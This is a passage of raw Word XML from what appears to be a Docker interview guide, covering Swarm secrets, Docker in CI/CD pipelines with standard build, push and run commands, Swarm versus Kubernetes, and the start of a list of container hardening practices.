        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Access the secret in the container:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> The secret is mounted as a file at /run/secrets/my_secret.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28030FEB"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For non-Swarm environments, consider using tools like Docker Compose with environment variables, or external secret management tools like HashiCorp Vault or AWS Secrets Manager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1886814A"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5" w:name="_Toc178383377"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>12. How do you implement Docker in a CI/CD pipeline?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="195"/>
    </w:p>
    <w:p w14:paraId="7B1AC254"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Docker can be integrated into a CI/CD pipeline to automate the build, test, and deployment process. Here’s an outline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9E1789" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="596"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Build Stage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F9C8E5" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="596"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Docker image is built from the Dockerfile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749CE922" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="596"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The image is tagged with a version or commit hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A8A56D" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="596"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The image is pushed to a Docker registry (e.g., Docker Hub, AWS ECR).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADF2BF9"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66189D03"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build -t myapp:${BUILD_TAG} .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594C68F6"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push myapp:${BUILD_TAG}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63637C48" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="596"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Test Stage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA3CAF7" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="596"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Run tests inside the container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AE6CC0" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="596"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use tools like Docker Compose to spin up dependent services for integration tests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568EE7E0" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="596"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Deploy Stage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43626C65" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="596"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Pull the Docker image from the registry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E5275F" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="596"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Deploy the container using Docker Swarm, Kubernetes, or other orchestration tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2448B2"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3D55864E"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docker pull myapp:${BUILD_TAG}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150E3136"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rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>docker run -d --name myapp -p 80:80 myapp:${BUILD_TAG}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C82940C"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6" w:name="_Toc178383378"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>13. What is the role of Docker Swarm? How does it differ from Kubernetes?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="196"/>
    </w:p>
    <w:p w14:paraId="18766960"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Docker Swarm is Docker's native clustering and orchestration tool. It enables the management of a group of Docker hosts as a single virtual host, providing scaling, load balancing, and failover for Docker containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B559A0"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Comparison with Kubernetes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753C091E" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="597"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Ease of Use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B36B45E" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="597"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Docker Swarm</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Simpler setup, native Docker integration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB2465A" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="597"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: More complex, but highly extensible and with more features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E41BA1E" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="597"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8DFF6B" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="597"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Docker Swarm</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Native clustering, load balancing, rolling updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748C82B6" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="597"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Advanced orchestration features, better support for complex applications, self-healing, and extensive ecosystem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7F6DF6" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="597"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Community and Adoption:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAA5B4C" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="597"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Widely adopted, larger community, supported by major cloud providers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7D3FCA" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="597"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Docker Swarm</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Smaller community, less widely adopted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4604DF4E"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7" w:name="_Toc178383379"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>14. Explain how you would secure a Docker container.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="197"/>
    </w:p>
    <w:p w14:paraId="43F792A5"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Securing a Docker container involves several practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC19F95" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Image Security:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E13D03A" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use official and trusted images.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79280447" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Regularly scan images for vulnerabilities using tools like Clair or Docker Security Scanning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F391560" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Container Security:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF5C7D6" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Run containers with the least privilege (--user flag).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F002CEA" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Limit container capabilities using --cap-drop and --cap-add.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C7F47D" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use read-only file systems (--read-only flag).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FB0CF8" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
